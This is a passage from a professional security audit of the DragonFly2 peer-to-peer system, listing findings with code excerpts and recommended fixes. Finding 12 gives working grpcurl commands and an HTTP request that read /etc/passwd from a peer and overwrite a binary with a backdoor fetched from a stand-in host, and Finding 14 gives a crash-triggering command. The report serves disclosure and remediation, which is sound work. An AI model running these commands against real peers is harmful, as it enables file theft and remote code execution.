DragonFly2 Security Assessment \n P U B L I C \n Recommendations \n Short term, change the error message code to avoid making incorrect dereferences. \n Long term, review codebase against this type of issue. Systematically use static analysis to \n detect this type of vulnerability. For example, use Trail of Bits\u2019 Semgrep \n invalid-usage-of-modified-variable rule . \n Trail of Bits 36 DragonFly2 Security Assessment \n P U B L I C \n 10. TrimLeft is used instead of TrimPre\ufb01x \n Severity: Informational Di\ufb03culty: Low \n Type: Data Validation Finding ID: TOB-DF2-10 \n Target: Various locations \n Description \n The strings.TrimLeft function is used at multiple points in the Dragon\ufb02y codebase to \n remove a pre\ufb01x from a string. This function has unexpected behavior; its second argument \n is an unordered set of characters to remove, rather than a pre\ufb01x to remove. The \n strings.TrimPrefix function should be used instead. \n The issues that were found are presented in \ufb01gures 10.1\u20134. However, the codebase may \n contain additional issues of this type. \n urlMeta.Range = strings.TrimLeft(r, http.RangePrefix) \n Figure 10.1: Dragonfly2/scheduler/job/job.go#175 \n rg = strings.TrimLeft(r, \"bytes=\" ) \n Figure 10.2: Dragonfly2/client/dfget/dfget.go#226 \n urlMeta.Range = strings.TrimLeft(rangeHeader, \"bytes=\" ) \n Figure 10.3: Dragonfly2/client/daemon/objectstorage/objectstorage.go#288 \n meta.Range = strings.TrimLeft(rangeHeader, \"bytes=\" ) \n Figure 10.4: Dragonfly2/client/daemon/transport/transport.go#264 \n Figure 10.5 shows an example of the di\ufb00erence in behavior between strings.TrimLeft \n and strings.TrimPrefix : \n strings.TrimLeft( \"bytes=bbef02\" , \"bytes=\" ) == \"f02\" \n strings.TrimPrefix( \"bytes=bbef02\" , \"bytes=\" ) == \"bbef02\" \n Figure 10.5: di\ufb00erence in behavior between strings.TrimLeft and strings.TrimPrefix \n The \ufb01nding is informational because we were unable to determine an exploitable attack \n scenario based on the vulnerability. \n Trail of Bits 37 DragonFly2 Security Assessment \n P U B L I C \n Recommendations \n Short term, replace incorrect calls to string.TrimLeft method with calls to \n string.TrimPrefix . \n Long term, test DragonFly2 functionalities against invalid and malformed data, such HTTP \n headers that do not adhere to the HTTP speci\ufb01cation. \n Trail of Bits 38 DragonFly2 Security Assessment \n P U B L I C \n 11. Vertex.DeleteInEdges and Vertex.DeleteOutEdges functions are not thread \n safe \n Severity: Undetermined Di\ufb03culty: High \n Type: Timing Finding ID: TOB-DF2-11 \n Target: Dragonfly2/pkg/graph/dag/vertex.go \n Description \n The Vertex.DeleteInEdges and Vertex.DeleteOutEdges functions are not thread \n safe, and may cause inconsistent states if they are called at the same time as other \n functions. \n Figure 11.1 shows implementation of the Vertex.DeleteInEdges function. \n // DeleteInEdges deletes inedges of vertex. \n func (v *Vertex[T]) DeleteInEdges() { \n for _, parent := range v.Parents.Values() { \n parent.Children.Delete(v) \n } \n v.Parents = set.NewSafeSet[*Vertex[T]]() \n } \n Figure 11.1: The Vertex.DeleteInEdges method \n ( Dragonfly2/pkg/graph/dag/vertex.go#54\u201361 ) \n The for loop iterates through the vertex\u2019s parents, deleting the corresponding entry in \n their Children sets. After the for loop, the vertex\u2019s Parents set is assigned to be the \n empty set. However, if a parent is added to the vertex (on another thread) in between \n these two operations, the state will be inconsistent. The parent will have the vertex in its \n Children set, but the vertex will not have the parent in its Parents set. \n The same problem happens in Vertex.DeleteOutEdges method, since its code is \n essentially the same, but with Parents swapped with Children in all occurrences. \n It is undetermined what exploitable problems this bug can cause. \n Recommendations \n Short term, give Vertex.DeleteInEdges and Vertex.DeleteOutEdges methods access \n to the DAG \u2019s mutex, and use mu.Lock to prevent other threads from accessing the DAG \n while Vertex.DeleteInEdges or Vertex.DeleteOutEdges is in progress. \n Trail of Bits 39 DragonFly2 Security Assessment \n P U B L I C \n Long term, consider writing randomized stress tests for these sorts of bugs; perform many \n writes concurrently, and see if any data races or invalid states occur. \n References \n \u25cf Documentation on golang\u2019s data race detector \n Trail of Bits 40 DragonFly2 Security Assessment \n P U B L I C \n 12. Arbitrary \ufb01le read and write on a peer machine \n Severity: High Di\ufb03culty: Low \n Type: Data Validation Finding ID: TOB-DF2-12 \n Target: Various locations \n Description \n A peer exposes the gRPC API and HTTP API for consumption by other peers. These APIs \n allow peers to send requests that force the recipient peer to create \ufb01les in arbitrary \ufb01le \n system locations, and to read arbitrary \ufb01les. This allows peers to steal other peers\u2019 secret \n data and to gain remote code execution (RCE) capabilities on the peer\u2019s machine. \n The gRPC API has, among others, the ImportTask and ExportTask endpoints (\ufb01gure \n 12.1). The \ufb01rst endpoint copies the \ufb01le speci\ufb01ed in the path argument (\ufb01gures 12.2 and \n 12.3) to a directory pointed by the dataDir con\ufb01guration variable (e.g., \n /var/lib/dragonfly ). \n // Daemon Client RPC Service \n service Daemon{ \n [skipped] \n // Import the given file into P2P cache system \n rpc ImportTask(ImportTaskRequest) returns (google.protobuf.Empty); \n // Export or download file from P2P cache system \n rpc ExportTask(ExportTaskRequest) returns (google.protobuf.Empty); \n [skipped] \n } \n Figure 12.1: De\ufb01nition of the gRPC API exposed by a peer \n ( api/pkg/apis/dfdaemon/v1/dfdaemon.proto#113\u2013131 ) \n message ImportTaskRequest { \n // Download url. \n string url = 1 [(validate.rules). string .min_len = 1 ]; \n // URL meta info. \n common.UrlMeta url_meta = 2 ; \n // File to be imported. \n string path = 3 [(validate.rules). string .min_len = 1 ]; \n // Task type. \n common.TaskType type = 4 ; \n } \n Figure 12.2: Arguments for the ImportTask endpoint \n ( api/pkg/apis/dfdaemon/v1/dfdaemon.proto#76\u201385 ) \n Trail of Bits 41 DragonFly2 Security Assessment \n P U B L I C \n file, err := os.OpenFile(t.DataFilePath, os.O_RDWR, defaultFileMode) \n if err != nil { \n return 0 , err \n } \n defer file.Close() \n if _, err = file.Seek(req.Range.Start, io.SeekStart); err != nil { \n return 0 , err \n } \n n, err := io.Copy(file, io.LimitReader(req.Reader, req.Range.Length)) \n Figure 12.3: Part of the WritePiece method (called by the handler of the ImportTask \n endpoint) that copies the content of a \ufb01le \n ( Dragonfly2/client/daemon/storage/local_storage.go#124\u2013133 ) \n The second endpoint moves the previously copied \ufb01le to a location provided by the output \n argument (\ufb01gures 12.4 and 12.5). \n message ExportTaskRequest { \n // Download url. \n string url = 1 [(validate.rules). string .min_len = 1 ]; \n // Output path of downloaded file. \n string output = 2 [(validate.rules). string .min_len = 1 ]; \n [skipped] \n } \n Figure 12.4: Arguments for the ExportTask endpoint \n ( api/pkg/apis/dfdaemon/v1/dfdaemon.proto#87\u2013104 ) \n dstFile, err := os.OpenFile(req.Destination, os.O_CREATE|os.O_RDWR|os.O_TRUNC, \n defaultFileMode) \n if err != nil { \n t.Errorf( \"open tasks destination file error: %s\" , err) \n return err \n } \n defer dstFile.Close() \n // copy_file_range is valid in linux \n // https://go-review.googlesource.com/c/go/+/229101/ \n n, err := io.Copy(dstFile, file) \n Figure 12.5: Part of the Store method (called by the handler of the ExportTask endpoint) that \n copies the content of a \ufb01le; req.Destination equals the output argument \n ( Dragonfly2/client/daemon/storage/local_storage.go#396\u2013404 ) \n The HTTP API, called Upload Manager, exposes the /download/:task_prefix/:task_id \n endpoint. This endpoint can be used to read a \ufb01le that was previously imported with the \n relevant gRPC API call. \n Trail of Bits 42 DragonFly2 Security Assessment \n P U B L I C \n Exploit Scenario \n Alice (a peer in a DragonFly2 system) wants to steal the /etc/passwd \ufb01le from Bob \n (another peer). Alice uses the command shown in \ufb01gure 12.6 to make Bob import the \ufb01le to \n a dataDir directory. \n grpcurl -plaintext -format json -d \\ \n '{\"url\":\"http://example.com\", \"path\":\"/etc/passwd\", \"urlMeta\":{\"digest\": \n \"md5:aaaff\", \"tag\":\"tob\"}}'$ BOB_IP:65000 dfdaemon.Daemon.ImportTask \n Figure 12.6: Command to steal /etc/passwd \n Next, she sends an HTTP request, similar to the one in \ufb01gure 12.7, to Bob. Bob returns the \n content of his /etc/passwd \ufb01le. \n GET /download/<prefix>/<sha256>?peerId=172.17.0.1-1-<tag> HTTP / 1.1 \n Host: $BOB_IP:55002 \n Range: bytes=0-100 \n Figure 12.7: Bob\u2019s response, revealing /etc/passwd contents \n Later, Alice uploads a malicious backdoor executable to the peer-to-peer network. Once \n Bob has downloaded (e.g., via the exportFromPeers method) and cached the backdoor \n \ufb01le, Alice sends a request like the one shown in \ufb01gure 12.8 to overwrite the \n /opt/dragonfly/bin/dfget binary with the backdoor. \n grpcurl -plaintext -format json -d \\ \n '{\"url\":\"http://alice.com/backdoor\", \"output\":\"/opt/dragonfly/bin/dfget\", \n \"urlMeta\":{\"digest\": \"md5:aaaff\", \"tag\":\"tob\"}}' $BOB_IP:65000 \n dfdaemon.Daemon.ExportTask \n Figure 12.8: Command to overwrite dfget binary \n After some time Bob restarts the dfget daemon, which executes Alice\u2019s backdoor on his \n machine. \n Recommendations \n Short term, sandbox the DragonFly2 daemon, so that it can access only \ufb01les within a \n certain directory. Mitigate path traversal attacks. Ensure that APIs exposed by peers cannot \n be used by malicious actors to gain arbitrary \ufb01le read or write, code execution, HTTP \n request forgery, and other unintended capabilities. \n Trail of Bits 43 DragonFly2 Security Assessment \n P U B L I C \n 13. Manager generates mTLS certi\ufb01cates for arbitrary IP addresses \n Severity: High Di\ufb03culty: Low \n Type: Authentication Finding ID: TOB-DF2-13 \n Target: Dragonfly2/manager/rpcserver/security_server_v1.go \n Description \n A peer can obtain a valid TLS certi\ufb01cate for arbitrary IP addresses, e\ufb00ectively rendering the \n mTLS authentication useless. The issue is that the Manager\u2019s Certificate gRPC service \n does not validate if the requested IP addresses \u201cbelong to\u201d the peer requesting the \n certi\ufb01cate\u2014that is, if the peer connects from the same IP address as the one provided in \n the certi\ufb01cate request. \n Please note that the issue is known to developers and marked with TODO comments, as \n shown in \ufb01gure 13.1. \n if addr, ok := p.Addr.(*net.TCPAddr); ok { \n ip = addr.IP.String() \n } else { \n ip, _, err = net.SplitHostPort(p.Addr.String()) \n if err != nil { \n return nil , err \n } \n } \n // Parse csr. \n [skipped] \n // Check csr signature. \n // TODO check csr common name and so on. \n if err = csr.CheckSignature(); err != nil { \n return nil , err \n } \n [skipped] \n // TODO only valid for peer ip \n // BTW we need support both of ipv4 and ipv6. \n ips := csr.IPAddresses \n if len (ips) == 0 { \n // Add default connected ip. \n ips = []net.IP{net.ParseIP(ip)} \n } \n Figure 13.1: The Manager\u2019s Certificate gRPC handler for the IssueCertificate endpoint \n ( Dragonfly2/manager/rpcserver/security_server_v1.go#65\u201398 ) \n Trail of Bits 44 DragonFly2 Security Assessment \n P U B L I C \n Recommendations \n Short term, implement the missing IP addresses validation in the IssueCertificate \n endpoint of the Manager\u2019s Certificate gRPC service. Ensure that a peer cannot obtain a \n certi\ufb01cate with an ID that does not belong to the peer. \n Long term, research common security problems in PKI infrastructures and ensure that \n DragonFly2\u2019s PKI does not have them. Ensure that if a peer IP address changes, the \n certi\ufb01cates issued for that IP are revoked. \n Trail of Bits 45 DragonFly2 Security Assessment \n P U B L I C \n 14. gRPC requests are weakly validated \n Severity: Undetermined Di\ufb03culty: Low \n Type: Data Validation Finding ID: TOB-DF2-14 \n Target: DragonFly2 \n Description \n The gRPC requests are weakly validated, and some requests\u2019 \ufb01elds are not validated at all. \n For example, the ImportTaskRequest \u2019s url_meta \ufb01eld is not validated and may be \n missing from a request (see \ufb01gure 14.1). Sending requests to the ImportTask endpoint (as \n shown in \ufb01gure 14.2) triggers the code shown in \ufb01gure 14.3. The highlighted call to the \n logger accesses the req.UrlMeta.Tag variable, causing a nil dereference panic (because \n the req.UrlMeta variable is nil ). \n message ImportTaskRequest { \n // Download url. \n string url = 1 [(validate.rules). string .min_len = 1 ]; \n // URL meta info. \n common.UrlMeta url_meta = 2 ; \n // File to be imported. \n string path = 3 [(validate.rules). string .min_len = 1 ]; \n // Task type. \n common.TaskType type = 4 ; \n } \n Figure 14.1: ImportTaskRequest de\ufb01nition, with the url_meta \ufb01eld missing any validation \n rules \n ( api/pkg/apis/dfdaemon/v1/dfdaemon.proto#76\u201385 ) \n grpcurl -plaintext -format json -d \\ \n '{\"url\":\"http://example.com\", \"path\":\"x\"}' $PEER_IP:65000 dfdaemon.Daemon.ImportTask \n Figure 14.2: An example command that triggers panic in the daemon gRPC server \n s.Keep() \n peerID := idgen.PeerIDV1(s.peerHost.Ip) \n taskID := idgen.TaskIDV1(req.Url, req.UrlMeta) \n log := logger.With( \"function\" , \"ImportTask\" , \"URL\" , req.Url, \"Tag\" , req.UrlMeta.Tag, \n \"taskID\" , taskID, \"file\" , req.Path) \n Figure 14.3: The req.UrlMeta variable may be nil \n ( Dragonfly2/client/daemon/rpcserver/rpcserver.go#871\u2013874 ) \n Trail of Bits 46 DragonFly2 Security Assessment \n P U B L I C \n Another example of weak validation can be observed in the de\ufb01nition of the UrlMeta \n request (\ufb01gure 14.4). The digest \ufb01eld of the request should contain a pre\ufb01x followed by \n an either MD5 or SHA256 hex-encoded hash. While pre\ufb01x and hex-encoding is validated, \n length of the hash is not. The length is validated only during the parsing . \n // UrlMeta describes url meta info. \n message UrlMeta { \n // Digest checks integrity of url content, for example md5:xxx or sha256:yyy. \n string digest = 1 [(validate.rules). string = {pattern: \n \"^(md5)|(sha256):[A-Fa-f0-9]+$\" , ignore_empty: true }]; \n Figure 14.4: The UrlMeta request de\ufb01nition, with a regex validation of the digest \ufb01eld \n ( api/pkg/apis/common/v1/common.proto#163\u2013166 ) \n Recommendations \n Short term, add missing validations for the ImportTaskRequest and UrlMeta messages. \n Centralize validation of external inputs, so that it is easy to understand what properties are \n enforced on the data. Validate data as early as possible (for example, in the proto-related \n code). \n Long term, use fuzz testing to detect missing validations. \n Trail of Bits 47 DragonFly2 Security Assessment \n P U B L I C \n 15. Weak integrity checks for downloaded \ufb01les \n Severity: High Di\ufb03culty: Medium \n Type: Data Validation Finding ID: TOB-DF2-15 \n Target: DragonFly2 \n Description \n The DragonFly2 uses a variety of hash functions, including the MD5 hash. This algorithm \n does not provide collision resistance; it is secure only against preimage attacks. While these \n security guarantees may be enough for the DragonFly2 system, it is not completely clear if \n there are any scenarios where lack of the collision resistance would compromise the \n system. There are no clear bene\ufb01ts to keeping the MD5 hash function in the system. \n Figure 15.1 shows the core validation method that protects the integrity of \ufb01les \n downloaded from the peer-to-peer network. As shown in the \ufb01gure, the hash of a \ufb01le \n (sha256) is computed over hashes of all \ufb01le\u2019s pieces (MD5). So the security provided by the \n more secure sha256 hash is lost, because of use of the MD5. \n var pieceDigests [] string \n for i := int32 ( 0 ); i < t.TotalPieces; i++ { \n pieceDigests = append (pieceDigests, t.Pieces[i].Md5) \n } \n digest := digest.SHA256FromStrings(pieceDigests...) \n if digest != t.PieceMd5Sign { \n t.Errorf( \"invalid digest, desired: %s, actual: %s\" , t.PieceMd5Sign, digest) \n t.invalid.Store( true ) \n return ErrInvalidDigest \n } \n Figure 15.1: Part of the method responsible for validation of \ufb01les\u2019 integrity \n ( Dragonfly2/client/daemon/storage/local_storage.go#255\u2013265 ) \n The MD5 algorithm is hard coded over the entire codebase (e.g., \ufb01gure 15.2), but in some \n places the hash algorithm is con\ufb01gurable (e.g., \ufb01gure 15.3). Further investigation is required \n to determine whether an attacker can exploit the con\ufb01gurability of the system to perform \n downgrade attacks\u2014that is, to downgrade the security of the system by forcing users to \n use the MD5 algorithm, even when a more secure option is available. \n reader, err = digest.NewReader( digest.AlgorithmMD5 , io.LimitReader(resp.Body, \n int64 (req.piece.RangeSize)), digest.WithEncoded(req.piece.PieceMd5), \n Trail of Bits 48 DragonFly2 Security Assessment \n P U B L I C \n digest.WithLogger(req.log)) \n Figure 15.2: Hardcoded hash function \n ( Dragonfly2/client/daemon/peer/piece_downloader.go#188 ) \n switch algorithm { \n case AlgorithmSHA1: \n if len (encoded) != 40 { \n return nil , errors.New( \"invalid encoded\" ) \n } \n case AlgorithmSHA256: \n if len (encoded) != 64 { \n return nil , errors.New( \"invalid encoded\" ) \n } \n case AlgorithmSHA512: \n if len (encoded) != 128 { \n return nil , errors.New( \"invalid encoded\" ) \n } \n case AlgorithmMD5: \n if len (encoded) != 32 { \n return nil , errors.New( \"invalid encoded\" ) \n } \n default : \n return nil , errors.New( \"invalid algorithm\" ) \n } \n Figure 15.3: User-con\ufb01gurable hash function \n ( Dragonfly2/pkg/digest/digest.go#111\u2013130 ) \n Moreover, there are missing validations of the integrity hashes, for example in the \n ImportTask method (\ufb01gure 15.5). \n // TODO: compute and check hash digest if digest exists in ImportTaskRequest \n Figure 15.4: Missing hash validation \n ( Dragonfly2/client/daemon/rpcserver/rpcserver.go#904 ) \n Exploit Scenario \n Alice, a peer in the DragonFly2 system, creates two images: an innocent one, and one with \n malicious code. Both images consist of two pieces, and Alice generates the pieces so that \n their respective MD5 hashes collide (are the same). Therefore, the PieceMd5Sign \n metadata of both images are equal. Alice shares the innocent image with other peers, who \n attest to their validity (i.e., that it works as expected and is not malicious). Bob wants to \n download the image and requests it from the peer-to-peer network. After downloading the \n image, Bob checks its integrity with a SHA256 hash that is known to him. Alice, who is \n participating in the network, had already provided Bob the other image, the malicious one. \n Bob unintentionally uses the malicious image. \n Trail of Bits 49 DragonFly2 Security Assessment \n P U B L I C \n Recommendations \n Short term, remove support for the MD5. Always use SHA256, SHA3, or another secure \n hashing algorithm. \n Long term, take an inventory of all cryptographic algorithms used across the entire system. \n Ensure that no deprecated or non-recommended algorithms are used. \n Trail of Bits 50 DragonFly2 Security Assessment \n P U B L I C \n 16. Invalid error handling, missing return statement \n Severity: Informational Di\ufb03culty: Low \n Type: Error Reporting Finding ID: TOB-DF2-16 \n Target: Dragonfly2/pkg/source/transport_option.go, \n Dragonfly2/manager/service/preheat.go \n Description \n There are two instances of a missing return statement inside an if branch that handles \n an error from a downstream method. \n The \ufb01rst issue is in the UpdateTransportOption function, where failed parsing of the \n Proxy option prints an error, but does not terminate execution of the \n UpdateTransportOption function. \n func UpdateTransportOption(transport *http.Transport, optionYaml [] byte ) error { \n [skipped] \n if len (opt.Proxy) > 0 { \n proxy, err := url.Parse(opt.Proxy) \n if err != nil { \n fmt.Printf( \"proxy parse error: %s\\n\" , err) \n } \n transport.Proxy = http.ProxyURL(proxy) \n } \n Figure 16.1: the UpdateTransportOption function \n ( Dragonfly2/pkg/source/transport_option.go#45\u201358 ) \n The second issue is in the GetV1Preheat method, where failed parsing of the rawID \n argument does not result in termination of the method execution. Instead, the id variable \n will be assigned either the zero or max_uint value. \n func (s *service) GetV1Preheat(ctx context.Context, rawID string ) \n (*types.GetV1PreheatResponse, error ) { \n id, err := strconv.ParseUint(rawID, 10 , 32 ) \n if err != nil { \n logger.Errorf( \"preheat convert error\" , err) \n } \n Figure 16.2: the GetV1Preheat function \n ( Dragonfly2/manager/service/preheat.go#66\u201370 ) \n Trail of Bits 51 DragonFly2 Security Assessment \n P U B L I C \n Recommendations \n Short term, add the missing return statements in the UpdateTransportOption method. \n Long term, use static analysis to detect similar bugs. \n Trail of Bits 52 DragonFly2 Security Assessment \n P U B L I C \n 17. Tiny \ufb01le download uses hard coded HTTP protocol \n Severity: High Di\ufb03culty: High \n Type: Con\ufb01guration Finding ID: TOB-DF2-17 \n Target: DragonFly2 \n Description \n The code in the scheduler for downloading a tiny \ufb01le is hard coded to use the HTTP \n protocol, rather than HTTPS. This means that an attacker could perform a \n Man-in-the-Middle attack, changing the network request so that a di\ufb00erent piece of data \n gets downloaded. Due to the use of weak integrity checks ( TOB-DF2-15 ), this modi\ufb01cation \n of the data may go unnoticed. \n // DownloadTinyFile downloads tiny file from peer without range. \n func (p *Peer) DownloadTinyFile() ([] byte , error ) { \n ctx, cancel := context.WithTimeout(context.Background(), \n downloadTinyFileContextTimeout) \n defer cancel() \n // Download url: \n http://${host}:${port}/download/${taskIndex}/${taskID}?peerId=${peerID} \n targetURL := url.URL{ \n Scheme: \"http\" , \n Host: fmt.Sprintf( \"%s:%d\" , p.Host.IP, p.Host.DownloadPort), \n Path: fmt.Sprintf( \"download/%s/%s\" , p.Task.ID[: 3 ], p.Task.ID), \n RawQuery: fmt.Sprintf( \"peerId=%s\" , p.ID), \n } \n Figure 17.1: Hard-coded use of HTTP \n ( Dragonfly2/scheduler/resource/peer.go#435\u2013446 ) \n Exploit Scenario \n A network-level attacker who cannot join a peer-to-peer network performs a \n Man-in-the-Middle attack on peers. The adversary can do this because peers (partially) \n communicate over plaintext HTTP protocol. The attack chains this vulnerability with the one \n described in TOB-DF2-15 to replace correct \ufb01les with malicious ones. Unconscious peers \n use the malicious \ufb01les. \n Recommendations \n Short term, add a con\ufb01guration option to use HTTPS for these downloads. \n Long term, audit the rest of the repository for other hard-coded uses of HTTP. \n Trail of Bits 53 DragonFly2 Security Assessment \n P U B L I C \n 18. Incorrect log message \n Severity: Informational Di\ufb03culty: Low \n Type: Auditing and Logging Finding ID: TOB-DF2-18 \n Target: Dragonfly2/scheduler/service/service_v1.go \n Description \n The scheduler service may sometimes output two di\ufb00erent logging messages stating two \n di\ufb00erent reasons why a task is being registered as a normal task. \n The following code is used to register a peer and trigger a seed peer download task. \n // RegisterPeerTask registers peer and triggers seed peer download task. \n func (v *V1) RegisterPeerTask(ctx context.Context, req *schedulerv1.PeerTaskRequest) \n (*schedulerv1.RegisterResult, error ) { \n [skipped] \n // The task state is TaskStateSucceeded and SizeScope is not invalid. \n switch sizeScope { \n case commonv1.SizeScope_EMPTY: \n [skipped] \n case commonv1.SizeScope_TINY: \n // Validate data of direct piece. \n if !peer.Task.CanReuseDirectPiece() { \n peer.Log.Warnf( \"register as normal task, because of length of \n direct piece is %d, content length is %d\" , \n len (task.DirectPiece), task.ContentLength.Load()) \n break \n } \n result, err := v.registerTinyTask(ctx, peer) \n if err != nil { \n peer.Log.Warnf( \"register as normal task, because of %s\" , \n err.Error()) \n break \n } \n return result, nil \n case commonv1.SizeScope_SMALL: \n result, err := v.registerSmallTask(ctx, peer) \n if err != nil { \n peer.Log.Warnf( \"register as normal task, because of %s\" , \n Trail of Bits 54 DragonFly2 Security Assessment \n P U B L I C \n err.Error()) \n break \n } \n return result, nil \n } \n result, err := v.registerNormalTask(ctx, peer) \n if err != nil { \n peer.Log.Error(err) \n v.handleRegisterFailure(ctx, peer) \n return nil , dferrors.New(commonv1.Code_SchedError, err.Error()) \n } \n peer.Log.Info( \"register as normal task, because of invalid size scope\" ) \n return result, nil \n } \n Figure 18.1: Code snippet with incorrect logging \n ( Dragonfly2/scheduler/service/service_v1.go#93\u2013173 ) \n Each of the highlighted sets of lines above print \u201cregister as normal task, because [reason],\u201d \n before exiting from the switch statement. Then, the task is registered as a normal task. \n Finally, another message is logged: \u201cregister as normal task, because of invalid size scope.\u201d \n This means that two di\ufb00erent messages may be printed (one as a warning message, one as \n an informational message) with two contradicting reasons for why the task was registered \n as a normal task. \n This does not cause any security problems directly but may lead to di\ufb03culties while \n managing a DragonFly system or debugging DragonFly code. \n Recommendations \n Short term, move the peer.Log.Info function call into a default branch in the switch \n statement so that it is called only when the size scope is invalid. \n Trail of Bits 55 DragonFly2 Security Assessment \n P U B L I C \n 19. Usage of architecture-dependent int type \n Severity: Informational Di\ufb03culty: Low \n Type: Data Validation Finding ID: TOB-DF2-19 \n Target: Dragonfly2 \n Description \n The DragonFly2 uses int and uint numeric types in its golang codebase. These types\u2019 bit \n sizes are either 32 or 64 bits, depending on the hardware where the code is executed. \n Because of that, DragonFly2 components running on di\ufb00erent architectures may behave \n di\ufb00erently. These discrepancies in behavior may lead to unexpected crashes of some \n components or incorrect data handling. \n For example, the handlePeerSuccess method casts peer.Task.ContentLength \n variable to the int type. Schedulers running on di\ufb00erent machines may behave di\ufb00erently, \n because of this behavior. \n if len (data) != int (peer.Task.ContentLength.Load()) { \n peer.Log.Errorf( \"download tiny task length of data is %d, task content length \n is %d\" , len (data), peer.Task.ContentLength.Load()) \n return \n } \n Figure 19.1: example use of architecture-dependent int type \n ( Dragonfly2/scheduler/service/service_v1.go#1240\u20131243 ) \n Recommendations \n Short term, use a \ufb01xed bit size for all integer values. Alternatively, ensure that using the \n int type will not impact any computing where results must agree on all participants\u2019 \n computers. \n Trail of Bits 56 DragonFly2 Security Assessment \n P U B L I C \n A. Vulnerability Categories \n The following tables describe the vulnerability categories, severity levels, and di\ufb03culty \n levels used in this document. \n Vulnerability Categories \n Category Description \n Access Controls Insu\ufb03cient authorization or assessment of rights \n Auditing and Logging Insu\ufb03cient auditing of actions or logging of problems \n Authentication Improper identi\ufb01cation of users \n Con\ufb01guration Miscon\ufb01gured servers, devices, or software components \n Cryptography A breach of system con\ufb01dentiality or integrity \n Data Exposure Exposure of sensitive information \n Data Validation Improper reliance on the structure or values of data \n Denial of Service A system failure with an availability impact \n Error Report ing Insecure or insu\ufb03cient reporting of error conditions \n Patching Use of an outdated software package or library \n Session Management Improper identi\ufb01cation of authenticated users \n Testing Insu\ufb03cient test methodology or test coverage \n Timing Race conditions or other order-of-operations \ufb02aws \n Unde\ufb01ned Behavior Unde\ufb01ned behavior triggered within the system \n Trail of Bits 57 DragonFly2 Security Assessment \n P U B L I C \n Severity Levels \n Severity Description \n Inform ational The issue does not pose an immediate risk but is relevant to security best \n practices. \n Undetermined The extent of the risk was not determined during this engagement. \n Low The risk is small or is not one the client has indicated is important. \n Medium User information is at risk; exploitation could pose reputational, legal, or \n moderate \ufb01nancial risks. \n High The \ufb02aw could a\ufb00ect numerous users and have serious reputational, legal, \n or \ufb01nancial implications. \n Di\ufb03culty Levels \n Di\ufb03culty Description \n Undetermined The di\ufb03culty of exploitation was not determined during this engagement. \n Low The \ufb02aw is well known; public tools for its exploitation exist or can be \n scripted. \n Medium An attacker must write an exploit or will need in-depth knowledge of the \n system. \n High An attacker must have privileged access to the system, may need to know \n complex technical details, or must discover other weaknesses to exploit this \n issue. \n Trail of Bits 58 DragonFly2 Security Assessment \n P U B L I C \n B. Code Maturity Categories \n The following tables describe the code maturity categories and rating criteria used in this \n document. \n Code Maturity Categories \n Category Description \n Arithmetic The proper use of mathematical operations and semantics \n Auditing The use of event auditing and logging to support monitoring \n Authentication / \n Access Controls The use of robust access controls to handle identi\ufb01cation and \n authorization and to ensure safe interactions with the system \n Complexity \n Management The presence of clear structures designed to manage system complexity, \n including the separation of system logic into clearly de\ufb01ned functions \n Con\ufb01guration The con\ufb01guration of system components in accordance with best \n practices \n Cryptography and \n Key Management The safe use of cryptographic primitives and functions, along with the \n presence of robust mechanisms for key generation and distribution \n Data Handling The safe handling of user inputs and data processed by the system \n Documentation The presence of comprehensive and readable codebase documentation \n Maintenance The timely maintenance of system components to mitigate risk \n Memory Safety \n and Error Handling The presence of memory safety and robust error-handling mechanisms \n Testing and \n Veri\ufb01cation The presence of robust testing procedures (e.g., unit tests, integration \n tests, and veri\ufb01cation methods) and su\ufb03cient test coverage \n Trail of Bits 59 DragonFly2 Security Assessment \n P U B L I C \n Rating Criteria \n Rating Description \n Strong No issues were found, and the system exceeds industry standards. \n Satisfactory Minor issues were found, but the system is compliant with best practices. \n Moderate Some issues that may a\ufb00ect system safety were found. \n Weak Many issues that a\ufb00ect system safety were found. \n Missing A required component is missing, signi\ufb01cantly a\ufb00ecting system safety. \n Not Applicable The category is not applicable to this review. \n Not Considered The category was not considered in this review. \n Further \n Investigation \n Required Further investigation is required to reach a meaningful conclusion. \n Trail of Bits 60 DragonFly2 Security Assessment \n P U B L I C \n C. Code Quality Issues \n This appendix contains \ufb01ndings that do not have immediate or obvious security \n implications. However, they may facilitate exploit chains targeting other vulnerabilities or \n may become easily exploitable in future releases. \n 1. Redundant variable in loadLegacyGPRCTLSCredentials method. The \n mergedOptions string is never used. \n func loadLegacyGPRCTLSCredentials(opt config.SecurityOption, certifyClient \n *certify.Certify, security config.GlobalSecurityOption) \n (credentials.TransportCredentials, error ) { \n // merge all options \n var mergedOptions = security \n mergedOptions.CACert += \"\\n\" + opt.CACert \n mergedOptions.TLSVerify = opt.TLSVerify || security.TLSVerify \n Figure C.1.1: Redundant variable declaration \n ( Dragonfly2/client/daemon/daemon.go#364\u2013368 ) \n 2. URLs are parsed with regexes and string methods. Instead, use a dedicated APIs \n like net/url . \n fileds := strings.Split(polished[ 0 ], \",\" ) \n host := strings.Split(fileds[ 0 ], \"=\" )[ 1 ] \n query := strings.Join(fileds[ 1 :], \"&\" ) \n return fmt.Sprintf( \"%s?%s\" , host, query) \n Figure C.2.1: Example code handling a URL with strings methods \n ( Dragonfly2/manager/job/preheat.go#314\u2013317 ) \n func parseAccessURL(url string ) (*preheatImage, error ) { \n r := accessURLPattern.FindStringSubmatch(url) \n if len (r) != 5 { \n return nil , errors.New( \"parse access url failed\" ) \n } \n Figure C.2.2: Example code handling an URL with a regex \n ( Dragonfly2/manager/job/preheat.go#324\u2013328 ) \n 3. Deprecated os.Is * family of functions is used. Instead, use the errors.Is \n function. \n if err := os.MkdirAll(t.dataDir, dataDirMode); err != nil && !os.IsExist(err) { \n Figure C.3.1: An example use of deprecated os.Is* methods family \n ( Dragonfly2/client/daemon/storage/storage_manager.go#427 ) \n Trail of Bits 61 DragonFly2 Security Assessment \n P U B L I C \n } else if os.IsPermission(err) || dir == \"/\" { \n Figure C.3.2: Another example of using deprecated os.Is* methods family \n ( Dragonfly2/client/config/dfcache.go#228 ) \n 4. Redundant nil check in unmarshal method. The err can be simply returned. \n if err != nil { \n return err \n } \n return nil \n Figure C.4.1: The redundant if statement \n ( Dragonfly2/client/util/types.go#122\u2013125 ) \n 5. The ioutil.ReadFile and ioutil.ReadDir methods are deprecated. \n However, they are used in multiple places. \n data, err := ioutil.ReadFile(file) \n Figure C.5.1: An example use of deprecated ioutil.ReadFile method \n ( Dragonfly2/cmd/dependency/dependency.go#203 ) \n 6. The fmt.Sprintf method is used to concatenate the IP host and port in \n multiple places. Instead, use the net.JoinHostPort function. \n func NewDfstore() *DfstoreConfig { \n url := url.URL{ \n 